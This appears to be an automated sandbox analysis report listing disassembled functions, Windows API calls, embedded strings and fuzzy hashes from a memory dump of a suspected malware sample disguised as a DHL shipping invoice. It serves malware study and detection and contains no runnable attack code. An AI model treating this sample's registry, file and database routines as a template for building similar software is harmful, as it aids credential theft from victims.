                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4131475296-0
                                                                                                                                                                                                                                      • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                                                                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                                      • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFilefreememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2507021081-0
                                                                                                                                                                                                                                      • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4131324427-0
                                                                                                                                                                                                                                      • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PathTemp$free
                                                                                                                                                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                                      • API String ID: 924794160-1420421710
                                                                                                                                                                                                                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                                      • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                                      • String ID: General
                                                                                                                                                                                                                                      • API String ID: 999786162-26480598
                                                                                                                                                                                                                                      • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                                                                                                      • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                                      • API String ID: 0-1953309616
                                                                                                                                                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                                                                                                      • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4053608372-0
                                                                                                                                                                                                                                      • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
